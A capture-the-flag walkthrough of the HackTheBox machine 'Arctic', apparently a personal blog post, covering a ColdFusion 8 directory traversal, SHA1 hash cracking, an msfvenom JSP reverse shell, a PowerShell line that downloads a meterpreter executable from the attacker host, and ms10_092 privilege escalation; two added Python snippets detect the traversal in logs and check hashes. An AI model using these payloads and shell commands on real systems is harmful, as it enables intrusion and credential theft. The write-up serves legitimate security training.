Arctic Writeup

Arctic Writeup / Walkthrough Hack the box

TL;DR

This is a writeup on Arctic which is a Linux box categorized as easy on HackTheBox, and has Adobe’s ColdFusion as a primary service running on it. The exploitation essentially leverages enumeration and CVEs, namely Adobe ColdFusion – Directory Traversal & MS10_092. Interestingly, it does require us to escalate the user privileges for obtaining the root flag.

Walkthrough

Before we start, I want to let you know that this particular box, Arctic on HackTheBox, has a serious latency issue. It took about 20-30 seconds to serve each request, and it sadly kept dying on me. I had to reset it a few times, so you might notice different IP addresses for the box in the included screenshots and commands.

Arctic Writeup: Scanning Network

Let’s start off by running an obvious nmap scan.

# Nmap 7.70 scan initiated as: nmap -sC -sV -oA nmap.basic 10.129.156.45
Nmap scan report for 10.129.150.85
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

So, the scan has returned three open ports: 135, 8500 and 49154. Of these, 135 and 49154 are running the standard Microsoft RPC service. Let’s first explore port 8500, as it seems the most interesting.

Arctic Writeup: Enumeration

Starting off with the browser view of port 8500.

Port 8500 browser view

We find two directories, namely CFIDE and cfdocs. Enumerating further into /CFIDE/:

Port 8500 /CFIDE/

We have plenty of files and directories in here, but “administrator” sounds worth exploring first 😉

Port 8500 /CFIDE/administrator

Okay, so we have a login page of “ColdFusion 8” running here, with the username locked to admin.
You can check out this link to learn more about Adobe’s ColdFusion.

I also googled the changelog for ColdFusion 8 and found that there was only a single sub-version of version 8, i.e. “ColdFusion v8.0.1”. Thus, we can be fairly sure that we are dealing with ColdFusion v8.0.1 here. It’s always wise to do version enumeration; you never know where it may help you out 😉

I did try a few default passwords like “admin”, “password”, etc. but had no luck with them. And I couldn’t afford to brute-force my way in because this box took a freaking 30 seconds to respond to every request.

Arctic Writeup: Exploitation

So, let’s search for exploits available for ColdFusion 8.

I found this Directory Traversal exploit on ExploitDB

ColdFusion Directory Traversal exploit

Arctic Writeup: Using the Directory Traversal Exploit

Modifying the URL (as per the instructions in the exploit) –

http://10.129.150.104:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
Result for Directory Traversal Exploit
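From the defender’s side, the request above is easy to spot in web-server access logs: a locale parameter carrying ../ sequences and a %00 null byte aimed at password.properties. The following is an added example, not part of the original writeup; the log lines are constructed and the decoding handles single- and double-percent-encoded variants.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in combined-log format (not from the original
# page). Lines 1 and 2 carry the traversal + null-byte pattern shown above.
SAMPLE_LOGS = [
    '10.10.14.52 - - [01/Jan/2021:10:00:00 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 512',
    '10.10.14.52 - - [01/Jan/2021:10:00:05 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 1034',
    '10.10.14.52 - - [01/Jan/2021:10:00:09 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%252f..%252fColdFusion8%252flib%252fpassword.properties%2500en HTTP/1.1" 200 1034',
    '10.10.14.52 - - [01/Jan/2021:10:01:00 +0000] "GET /cfdocs/index.html HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def decode_path(path):
    """Percent-decode twice so double-encoded sequences (%252e, %2500) are exposed too."""
    return unquote(unquote(path))


def classify_request(path):
    """Return the reasons a request path looks like the ColdFusion locale
    traversal, or an empty list for a benign path."""
    decoded = decode_path(path)
    reasons = []
    if "../" in decoded or "..\\" in decoded:
        reasons.append("traversal")
    if "\x00" in decoded:
        reasons.append("null-byte")
    if "password.properties" in decoded.lower():
        reasons.append("sensitive-file")
    return reasons


def scan_logs(lines):
    """Return a list of (line_index, raw_path, reasons) for every suspicious request."""
    hits = []
    for i, line in enumerate(lines):
        m = REQUEST_RE.search(line)
        if m is None:
            continue
        reasons = classify_request(m.group("path"))
        if reasons:
            hits.append((i, m.group("path"), reasons))
    return hits


if __name__ == "__main__":
    for idx, path, reasons in scan_logs(SAMPLE_LOGS):
        print(f"line {idx}: {', '.join(reasons)} -> {path}")
```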

The exploit did work and reveals a password hash:

password = 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

Analyzing the password hash

Using a hash identifier website, I found that the hash type is SHA1.

Identifying the hash type

Trying a few online SHA1 lookup websites, I was able to recover the plaintext for the password hash using this site.

Recovered password:
password = happyday
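As an added check (not part of the original post), the online lookup can be reproduced offline: the page’s hash is an unsalted SHA1 hex digest of the password, so any candidate can be hashed and compared directly, which is exactly why a leaked password.properties is so damaging. The properties text and the candidate list below are constructed; the hash value is the one shown above.

```python
import hashlib

# Constructed excerpt in the layout of a Java .properties file (not the real
# file); the hash value is the one the traversal returned above.
PASSWORD_PROPERTIES = """\
# constructed sample, not the real file
password = 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
"""

# Constructed candidate list: the defaults tried earlier plus the recovered value.
CANDIDATES = ["admin", "password", "happyday"]


def parse_properties(text):
    """Parse 'key = value' lines, skipping blank lines and '#'/'!' comments."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#!":
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def sha1_hex_upper(candidate):
    """Unsalted SHA1 of the candidate as upper-case hex, matching the stored format."""
    return hashlib.sha1(candidate.encode("utf-8")).hexdigest().upper()


def match_candidate(stored_hash, candidates):
    """Return the candidate whose SHA1 equals stored_hash, or None if none matches."""
    target = stored_hash.strip().upper()
    for candidate in candidates:
        if sha1_hex_upper(candidate) == target:
            return candidate
    return None


if __name__ == "__main__":
    stored = parse_properties(PASSWORD_PROPERTIES)["password"]
    print(stored, "->", match_candidate(stored, CANDIDATES))
```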
Administrator account ColdFusion

Great! Using the recovered password, we are logged in as “Administrator”.

Arctic Writeup: Getting a reverse shell

There is a whole lot that can be done here, but what’s of use to us is the “Scheduled Tasks” feature under the “Debugging & Logging” section, which ColdFusion offers and which allows us to upload files.

I will be creating a reverse shell in JSP using msfvenom, to upload.
Why JSP?
Because after taking a small hint from other walkthroughs, I learned that ColdFusion serves and runs JSP files.

Creating a JSP reverse shell using msfvenom (fill in your own LHOST and LPORT values):

┌─[root@kali]─[~/Desktop/Arctic HTB]
└──╼ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.52 LPORT=8500 > shell.jsp
Payload size: 1500 bytes

Let’s copy this reverse shell file into our apache web server directory i.e. /var/www/sheerazali.com/

┌─[root@kali]─[~/Desktop/Arctic HTB]
└──╼ cp shell.jsp /var/www/sheerazali.com/

and start the apache server on our machine.

┌─[root@kali]─[~/Desktop/Arctic HTB]
└──╼ service apache2 start

Checking the localhost webpage to ensure that we have the file “shell.jsp” hosted.

shell.jsp hosted on localhost

Now, let’s schedule a task in ColdFusion to visit this “shell.jsp” file on our server and do the magic 😉
I will add the URL of our server where the “shell.jsp” file resides, i.e. http://10.10.14.52/shell.jsp, and will also specify the destination path where the file is saved on the box, i.e. C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

Scheduling a task on ColdFusion

Once the task is scheduled, run it!

Run the scheduled task

It will take a while, and then give the message “This scheduled task was completed successfully.”

Verifying that we have successfully uploaded “shell.jsp” to the CFIDE directory.

shell.jsp uploaded on the box

So yes, shell.jsp has been uploaded successfully.

Let’s open up the listening port 8500 on our machine (as 8500 was the port we set as LPORT in shell.jsp):

┌─[root@kali]─[~/Desktop/Arctic HTB]
└──╼ nc -nlvp 8500
listening on [any] 8500 …

Let’s now visit the URL of the “shell.jsp” file on the box: http://10.129.150.104:8500/CFIDE/shell.jsp
Yay! We have a reverse shell!

reverse shell

Arctic Writeup: User Flag

On running the command “whoami” we find out that the current user is “tolis”.

User flag

Voila 🎉 We have the user flag. Now we have to escalate our privileges.

Arctic Writeup: Root Flag

Getting a reverse meterpreter shell

Now, because this is just a plain reverse shell, let us try getting a meterpreter session on the box.
Let’s create a Windows reverse meterpreter payload using msfvenom:

┌─[root@kali]─[~/Desktop/Arctic HTB]
└──╼ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.52 LPORT=8500 -f exe > met_shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

And copy it to the server directory to be able to host this file on the server.

┌─[root@kali]─[~/Desktop/Arctic HTB]
└──╼ cp met_shell.exe /var/www/sheerazali.com/

Now let’s run this PowerShell command in the plain reverse shell we obtained earlier:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.52/met_shell.exe','meterpreter.exe')"

So, now we have “meterpreter.exe” on the box.

uploaded meterpreter.exe on the box

Let’s use “exploit/multi/handler” in Metasploit:

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > options
 Module options (exploit/multi/handler):
 Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------
 Exploit target:
 Id  Name
    --  ----
    0   Wildcard Target

 msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp

 msf5 exploit(multi/handler) > show options
 Module options (exploit/multi/handler):
 Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------
 Payload options (windows/meterpreter/reverse_tcp):
 Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    LHOST                      yes       The listen address (an interface may be specified)
    LPORT     4444             yes       The listen port
 Exploit target:
 Id  Name
    --  ----
    0   Wildcard Target

 msf5 exploit(multi/handler) > set LHOST 10.10.14.52
 LHOST => 10.10.14.52
 msf5 exploit(multi/handler) > set LPORT 8500
 LPORT => 8500

 msf5 exploit(multi/handler) > run
 [*] Started reverse TCP handler on 10.10.14.52:8500 

Now let’s run the “meterpreter.exe” file on the box using our current shell.

running meterpreter.exe on the box

And there we have our reverse meterpreter shell 🙂

reverse meterpreter shell

PS: We are running an x86 meterpreter session on an x64 box.

I also tried the command “getsystem” to gain root, you know, just in case 😉 but it didn’t work lol

Trying to get AUTHORITY access using getsystem

Now, let’s run the “local_exploit_suggester”. This module basically suggests local exploits that the box may be vulnerable to.

meterpreter > 
 Background session 1? [y/N]  
 msf5 exploit(multi/handler) > search suggest
 Matching Modules
 #  Name                                             Disclosure Date  Rank    Check  Description
 ----                                             ---------------  ----    -----  -----------
 0  auxiliary/server/icmp_exfil                                       normal  No     ICMP Exfiltration Service
 1  exploit/windows/browser/ms10_018_ie_behaviors    2010-03-09       good    No     MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free
 2  exploit/windows/smb/timbuktu_plughntcommand_bof  2009-06-25       great   No     Timbuktu PlughNTCommand Named Pipe Buffer Overflow
 3  post/multi/recon/local_exploit_suggester                          normal  No     Multi Recon Local Exploit Suggester
 4  post/osx/gather/enum_colloquy                                     normal  No     OS X Gather Colloquy Enumeration
 5  post/osx/manage/sonic_pi                                          normal  No     OS X Manage Sonic Pi 
 msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester 
 msf5 post(multi/recon/local_exploit_suggester) > show options
 Module options (post/multi/recon/local_exploit_suggester):
 Name             Current Setting  Required  Description
    ----             ---------------  --------  -----------
    SESSION                           yes       The session to run this module on
    SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits
 msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
 SESSION => 1
 msf5 post(multi/recon/local_exploit_suggester) > run

OK so we have some interesting results,

x86 results from local_exploit_suggester

Also, because we are running an x86 architecture meterpreter session on an x64 architecture box, we should additionally try to migrate our meterpreter session to an x64 architecture and re-run the “local_exploit_suggester” module as they may return different results.

Arctic Writeup: Migrating meterpreter shell

So, let’s migrate our x86 meterpreter session into an x64 process.

checking the running processes to migrate to

Let’s choose a process with x64 architecture.
I will be avoiding “powershell.exe” because migrating into it may cause that process to die, and if “powershell.exe” dies our meterpreter session dies with it.
Let’s use “jrun.exe” with pid 1140.

So, now we have successfully migrated into an x64 meterpreter session. Let’s re-run the “local_exploit_suggester”:

x64 results from local_exploit_suggester

Comparing the two results from the x86 session and the x64 session, we can see that “exploit/windows/local/ms10_092_schelevator”, which is ideal for escalating privileges, is common to both. Let’s try the exploit “ms10_092”:

windows/local/ms10_092_schelevator

Awesome! 🥳 We are AUTHORITY\SYSTEM. Here’s the root flag.

Until the next box, check out other intriguing writeups here.
